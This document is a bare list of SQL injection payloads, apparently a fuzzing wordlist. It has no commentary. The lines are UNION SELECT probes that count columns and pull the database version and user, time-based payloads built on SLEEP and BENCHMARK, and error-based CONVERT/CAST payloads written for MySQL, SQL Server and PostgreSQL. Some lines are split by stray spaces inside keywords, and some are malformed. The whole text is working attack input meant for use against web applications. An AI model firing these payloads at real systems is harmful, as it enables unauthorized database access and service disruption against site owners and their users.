 UNION SELECT @@VERSION,SLEEP(5),3
 UNION SELECT @@VERSION,SLEEP(5),USER(),4
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7   ,8,9,10
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,1   2,13,14,15,16,17,18,19,20
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,   10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 UNION SELECT @@VERSION,SLEEP(5),"'3
 UNION SELECT @@VERSION,SLEEP(5),"'3'"#
 UNION SELECT @@VERSION,SLEEP(5),USER(),4#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#
 UNION SELECT @@VERSION,SLEEP(5),USE   R(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 UNION S   ELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2   0,21,22,23,24,25,26,27,28#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#
 UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1000000,MD5('A')),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#
 UNION ALL SELECT USER()-- 
 UNION ALL SELECT SLEEP(5)-- 
 UNION ALL SELECT USER(),SLEEP(5)-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5)-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A'))-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NU   LL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NU   LL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,   NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT @@VERSION,USER(),   SLEEP(5),BENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
 UNION ALL SELECT NULL-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(   84)+CHAR(88)+CHAR(118)+CHAR(120)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHA   R(65)+CHAR(113)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))-- 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))-- 
 UNION ALL SELECT NULL#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCH   AR(88)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CH   AR(75)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHA   R(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))#
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))#
 UNION ALL SELECT NULL 
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHAR(88)+CHAR(88)+CHA   R(88)+CHAR(88)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)))
 AND 5650   =CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)))
 AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)))
 AND 5650=CONVERT(INT,(UNION ALL SEL   ECTCHAR(73)+CHAR(78)+CHAR(74)+CHAR(69)+CHAR(67)+CHAR(84)+CHAR(88)+CHAR(118)+CHAR(120)+CHAR(80)+CHAR(75)+CHAR(116)+CHAR(69)+CHAR(65)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
 AND 5650=CONVERT(INT,(SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (5650=5650) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113)))
 AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||CHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(113)) AS NUMERIC)
 AND (SELECT 4523 FROM(SELECT COUNT(*),CONCAT(0x716a7a6a71,(SELECT (ELT(4523=4523,1))),0x71706a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
 UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(122)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(106)+CHAR(99)+CHAR(73)+CHAR(66)+CHAR(109)+CHAR(119)+CHAR(81)+CHAR(108)+CHAR(88)+CHAR(113)+CHAR(112)+CHAR(106)+CHAR(107)+CHAR(113),NULL-- 
 UNION ALL SELE   CT 'INJ'||'ECT'||'XXX'
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,   16,17
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25
